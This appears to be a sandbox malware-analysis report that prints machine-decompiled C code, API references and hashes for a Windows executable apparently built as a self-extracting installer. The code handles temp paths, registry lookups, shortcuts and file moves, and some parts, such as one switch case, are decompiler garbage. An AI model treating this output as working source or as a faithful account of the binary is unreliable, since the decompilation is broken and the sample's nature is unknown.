									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00D8E203(_t135, _v8 ^ _t136);
			}


































              0x00d9e2f5
              0x00d9e2fc
              0x00d9e2ff
              0x00d9e307
              0x00d9e30b
              0x00d9e317
              0x00d9e31a
              0x00d9e31d
              0x00d9e324
              0x00d9e32c
              0x00d9e32f
              0x00d9e335
              0x00d9e33b
              0x00d9e340
              0x00d9e342
              0x00d9e345
              0x00d9e34a
              0x00d9e354
              0x00d9e35b
              0x00d9e35e
              0x00d9e365
              0x00d9e36c
              0x00d9e398
              0x00d9e3be
              0x00d9e3c0
              0x00000000
              0x00d9e39a
              0x00d9e39d
              0x00d9e464
              0x00d9e470
              0x00d9e47b
              0x00d9e480
              0x00d9e3a3
              0x00d9e3aa
              0x00d9e3af
              0x00d9e3b5
              0x00d9e3bb
              0x00000000
              0x00d9e3bb
              0x00d9e3b5
              0x00d9e39d
              0x00d9e36e
              0x00d9e372
              0x00d9e375
              0x00d9e37b
              0x00d9e37d
              0x00d9e380
              0x00d9e384
              0x00d9e3c1
              0x00d9e3c4
              0x00d9e3c5
              0x00d9e3ca
              0x00d9e3d0
              0x00d9e3d6
              0x00d9e3e5
              0x00d9e3eb
              0x00d9e3f1
              0x00d9e3f6
              0x00d9e412
              0x00d9e485
              0x00d9e48b
              0x00d9e414
              0x00d9e414
              0x00d9e41c
              0x00d9e425
              0x00d9e42b
              0x00000000
              0x00d9e42d
              0x00d9e42f
              0x00d9e432
              0x00d9e44b
              0x00000000
              0x00d9e44d
              0x00d9e451
              0x00d9e453
              0x00d9e456
              0x00000000
              0x00d9e456
              0x00d9e451
              0x00d9e44b
              0x00d9e42b
              0x00d9e425
              0x00d9e412
              0x00d9e3f6
              0x00d9e3d0
              0x00000000
              0x00d9e459
              0x00d9e459
              0x00d9e48d
              0x00d9e49f

              APIs
              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D9EA62,00000000,00000000,00000000,00000000,00000000,00D93FBF), ref: 00D9E32F
              • __fassign.LIBCMT ref: 00D9E3AA
              • __fassign.LIBCMT ref: 00D9E3C5
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D9E3EB
              • WriteFile.KERNEL32(?,00000000,00000000,00D9EA62,00000000,?,?,?,?,?,?,?,?,?,00D9EA62,00000000), ref: 00D9E40A
              • WriteFile.KERNEL32(?,00000000,00000001,00D9EA62,00000000,?,?,?,?,?,?,?,?,?,00D9EA62,00000000), ref: 00D9E443
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: e81af21f73bd1eac132677d652915663498221f7bd71b490d76cc091eaee4799
              • Instruction ID: e5cc0a65a713f1622c76d001b46afb653c661088e40da2354264c441717d9a1e
              • Opcode Fuzzy Hash: e81af21f73bd1eac132677d652915663498221f7bd71b490d76cc091eaee4799
              • Instruction Fuzzy Hash: C3515EB1A002499FDF14CFA8D885BEEBBF9EF09310F18415AE955E7291E630D941CBB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8BB5B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
              Download Yara Rule
              C-Code - Quality: 52%
              			E00D8BB5B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E00D7AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0xdad5f8);
						__ebp - 0x7c84 = E00D73E41(0xdb85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00D79E6B(0xdb85fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xdb85fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E00D8A156();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00D81410(_t285 - 0xfc8c,  *((intOrPtr*)(0xdad618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M00D8C0D7))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E00D895F8(_t285 - 0x7c84, 0x800);
									E00D7A188(E00D7B625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E00D7A2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E00D76EF9(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E00D7A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E00D7A19E(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E00D7B1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E00D7AEA5(__eflags, _t285 - 0x103c, _t282);
										_t284 = E00D92B33(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E00D7B5E5(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E00D92B33(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E00D8E920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0xdadef4();
											goto L18;
										}
										L15:
										_t262 = E00D92B33(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E00D7A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E00D73E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
													MoveFileExW(_t285 - 0x103c, _t277, 4);
												}
												goto L25;
											}
										}
									}
								case 1:
									L27:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax =  *0xdcce0c;
										__eflags =  *0xdcce0c;
										__ebx = __ebx & 0xffffff00 |  *0xdcce0c == 0x00000000;
										__eflags = __bl;
										if(__bl == 0) {
											__eax =  *0xdcce0c;
											_pop(__ecx);
											_pop(__ecx);
										}
										L30:
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E00D8A2AE(__ecx, __edx, __eflags);
											__eax =  *0xdcce0c;
										} else {
											__esi = __ebp - 0x5c84;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L35:
										__eax = E00D92B33(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xdcce0c);
										__eax = E00D92B5E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0xdcce0c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E00D966ED(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00D92B4E(__esi);
										}
									}
									goto L164;
								case 2:
									L41:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L164;
								case 3:
									L43:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L164;
									}
									L44:
									__eflags =  *0xdb9602 - __di;
									if( *0xdb9602 != __di) {
										goto L164;
									}
									L45:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E00D92B33(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L164;
									} else {
										L48:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L52:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L64:
												__ebp - 0x103c = E00D7FAB1(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L65:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E00D90D9B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0xdb9602;
												E00D7FAB1(0xdb9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E00D89FFC(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__ebx =  *0xdadf7c;
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xdb9602); // executed
												__eax = __ebp - 0x103c;
												__eax = E00D92B69(__ebp - 0x103c, 0xdb9602, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = 0;
													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
												}
												goto L164;
											}
											L53:
											__eflags = __ax;
											if(__ax == 0) {
												L55:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xdadea8();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0xdadea4();
													_push( *(__ebp - 0x18));
													 *0xdade84() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E00D92B33(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E00D7FA89(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E00D92B33(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E00D7FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L65;
											}
											L54:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L64;
											}
											goto L55;
										}
										L49:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L52;
										}
										L50:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L164;
										}
										L51:
										__ebp - 0x103c = E00D7FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L65;
									}
								case 4:
									L70:
									__eflags =  *0xdb95fc - 1;
									__eflags = __eax - 0xdb95fc;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L75:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L82:
										 *0xdb75d2 = __cl;
										 *0xdb75d3 = 1;
										goto L164;
									}
									L76:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xdb75d2 = __cl;
										L81:
										 *0xdb75d3 = __cl;
										goto L164;
									}
									L77:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L82;
									}
									L78:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L164;
									}
									L79:
									 *0xdb75d2 = 1;
									goto L81;
								case 6:
									L88:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L92;
									}
									L89:
									__eax = __ebp - 0x5c84;
									__eax = E00D92B69(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L92;
									}
									L90:
									_push(__edi);
									goto L91;
								case 7:
									goto L0;
								case 8:
									L116:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E00D9668C(__ebx, __edi);
											_pop(__ecx);
											 *0xdcde1c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xdcde18 = E00D8A2AE(__ecx, __edx, __eflags);
									}
									 *0xdc5d03 = 1;
									goto L164;
								case 9:
									L121:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L92:
										 *0xdcde20 = 1;
										goto L164;
									}
									L122:
									_push(1);
									L91:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E00D8C431();
									goto L92;
								case 0xa:
									L123:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L164;
									}
									L124:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E00D959C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xdcad0a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E00D7FAB1();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0xdc9d0a);
											_push(__eax);
											__eax = E00D7FAB1();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xdcbd0a);
											_push(__eax);
											__eax = E00D7FAB1();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E00D94D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L132:
										__ebp - 0x6c84 = E00D79E6B(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L149;
										}
										L133:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L149;
										}
										L134:
										_push(0x20);
										_pop(__ecx);
										do {
											L135:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L137:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E00D79E6B(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L144:
													__esi->i = __di;
													L145:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L146;
												}
												L138:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L140:
													_push(0x20);
													_pop(__eax);
													do {
														L141:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L143:
													_push(__eax);
													__eax = E00D94D7E();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L145;
												}
												L139:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L143;
											}
											L136:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L146;
											}
											goto L137;
											L146:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L149;
									} else {
										L130:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E00D94D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E00D90BB8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E00D94D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L149:
										__eflags =  *(__ebp - 0x11c8c);
										__ebx = 0x800;
										if( *(__ebp - 0x11c8c) != 0) {
											_push(0x800);
											__eax = __ebp - 0x9c8c;
											_push(__ebp - 0x9c8c);
											__eax = __ebp - 0x11c8c;
											_push(__ebp - 0x11c8c);
											__eax = E00D7AED7();
										}
										_push(__ebx);
										__eax = __ebp - 0xbc8c;
										_push(__ebp - 0xbc8c);
										__eax = __ebp - 0x6c84;
										_push(__ebp - 0x6c84);
										__eax = E00D7AED7();
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E00D8A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E00D7AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E00D7FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E00D7AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E00D94D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E00D7FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E00D7B153(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L159:
											__ebp - 0x2c3c = E00D7FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L160;
										} else {
											L158:
											__eflags = __eax;
											if(__eflags == 0) {
												L160:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E00D79D3A(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E00D94D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E00D7B98D(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E00D89D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E00D89450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0xdadef8();
												}
												goto L164;
											}
											goto L159;
										}
									}
								case 0xb:
									L162:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xdb9600 = 1;
									}
									goto L164;
								case 0xc:
									L83:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E00D959C0( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xdb75d4 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xdb75d5 = 1;
										} else {
											__eax = 0;
											 *0xdb75d4 = __al;
											 *0xdb75d5 = __al;
										}
									}
									goto L164;
								case 0xd:
									L93:
									 *0xdcde21 = 1;
									__eax = __eax + 0xdcde21;
									_t104 = __esi + 0x39;
									 *_t104 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t104;
									__ebp = 0xffffa37c;
									if( *_t104 != 0) {
										_t106 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t106;
										_push(_t106);
										 *0xdad5fc = E00D813FC();
									}
									goto L164;
							}
							L2:
							_t210 = E00D89E24(_t210, _t279);
							_t279 = _t279 + 0x2000;
							_t277 = _t277 - 1;
							if(_t277 != 0) {
								goto L2;
							} else {
								_t280 = _t277;
								goto L4;
							}
						}
						L165:
						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
						return _t209;
					}
					L100:
					__eflags =  *0xdc5d02;
					if( *0xdc5d02 != 0) {
						goto L164;
					}
					L101:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E00D90BB8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L108:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E00D7FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E00D7FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E00D89C4F(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E00D89735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L164;
						} else {
							L111:
							__eax = 0;
							__eflags = 0;
							 *0xdb75d7 = 1;
							 *0xdb85fa = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L112;
						}
					}
					L102:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L108;
					}
					L103:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L104:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L105:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L106:
						goto L108;
					}
					L107:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E00D7FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L108;
					L112:
					__eflags = _t263 - 7;
					if(_t263 == 7) {
						__eflags =  *0xdb95fc;
						if( *0xdb95fc == 0) {
							 *0xdb95fc = 2;
						}
						 *0xdb85f8 = 1;
					}
					goto L164;
				}
			}










              0x00d8bb5b
              0x00d8bb5b
              0x00d8bb5b
              0x00d8bb5b
              0x00d8bb5e
              0x00000000
              0x00000000
              0x00d8bb64
              0x00d8bb64
              0x00d8bb6a
              0x00d8bb78
              0x00d8bb84
              0x00d8bb86
